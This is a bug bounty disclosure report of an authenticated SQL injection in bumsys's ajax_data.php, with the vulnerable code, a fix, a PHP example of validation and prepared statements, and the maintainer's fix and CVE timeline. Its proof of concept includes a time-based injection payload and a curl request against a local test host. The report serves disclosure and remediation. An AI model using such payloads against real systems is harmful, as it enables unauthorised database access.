SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys

Status: Valid

Reported on: Feb 28th 2023


Description

There exists an SQL injection affecting the customer_id parameter, located in the file core/ajax/ajax_data.php.

Let's take a look at the following code: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

The core problem is that, even though the function safe_input() is used in an effort to sanitize the customer_id variable, as seen here: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447

    $customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";

the query itself assumes customer_id is always an integer, and this is not enforced by quotes around the placeholder. SQL statements can therefore be injected without ever needing to include a quote character.

Fix

Change

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

to

                    where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0
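Quoting the placeholder makes the escaping done by safe_input() effective, but validating the value as an integer or binding it in a prepared statement removes the dependency on escaping altogether. The following is an added example (not bumsys code) showing why an unquoted numeric placeholder defeats quote escaping and how either hardened approach handles the same input; safe_input_stub() is a hypothetical stand-in for safe_input(), and fetch_stock() assumes a mysqli connection and is not invoked here.

```php
<?php
// Added example, not from the bumsys project. Illustrates the report's finding
// and two fixes that do not rely on escaping.

// Hypothetical stand-in for safe_input(): assumed to escape quote characters only.
function safe_input_stub(string $v): string {
    return addslashes(trim($v));
}

// Vulnerable pattern mirroring the report: integer interpolated without quotes.
function build_query_vulnerable(string $product_id, string $customer_id): string {
    return "SELECT * FROM product_stock WHERE stock_product_id = {$product_id} "
         . "AND sales_customer_id = {$customer_id} AND product_stock.is_trash = 0";
}

// Fix 1: reject anything that is not a plain integer before it reaches SQL.
function require_int(string $name, ?string $raw): int {
    $v = filter_var($raw, FILTER_VALIDATE_INT);
    if ($v === false) {
        throw new InvalidArgumentException("$name must be an integer");
    }
    return $v;
}

// Fix 2: prepared statement, so the value is bound as data, never parsed as SQL.
function fetch_stock(mysqli $db, int $product_id, int $customer_id): array {
    $stmt = $db->prepare(
        "SELECT * FROM product_stock WHERE stock_product_id = ? "
        . "AND sales_customer_id = ? AND product_stock.is_trash = 0"
    );
    $stmt->bind_param('ii', $product_id, $customer_id);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Constructed input with the shape of the report's customer_id parameter.
$payload = "0 OR (SELECT SLEEP(1))";
$escaped = safe_input_stub($payload);
// No quote in the input, so escaping leaves it unchanged and it lands in the WHERE clause.
echo ($escaped === $payload ? "escaping changed nothing" : "escaping altered input"), "\n";
echo build_query_vulnerable("2", $escaped), "\n";

try {
    require_int('customer_id', $payload);   // same input is rejected outright
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo require_int('customer_id', "17"), "\n"; // a legitimate id passes through as int
```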

Proof of Concept

Make a GET request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1)) with a valid session and a valid CSRF token, and observe the delay introduced by the call to SLEEP().

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"

Impact

Authenticated users are able to disclose the contents of the database.

We are processing your report and will contact the unilogies/bumsys team within 24 hours.
A GitHub Issue asking the maintainers to create a SECURITY.md exists.
We have contacted a member of the unilogies/bumsys team and are waiting to hear back.
Khurshid Alam validated this vulnerability:

Good finding. Will fix soon. Thank you.

tsarsecurity has been awarded the disclosure bounty.
Khurshid Alam marked this as fixed in v2.0.2 with commit 6a328e.
Khurshid Alam has been awarded the fix bounty.
This vulnerability has now been published.
Khurshid Alam (Maintainer):

@admin, please assign a CVE.

Ben Harvie (Admin):

CVE assigned as requested :)
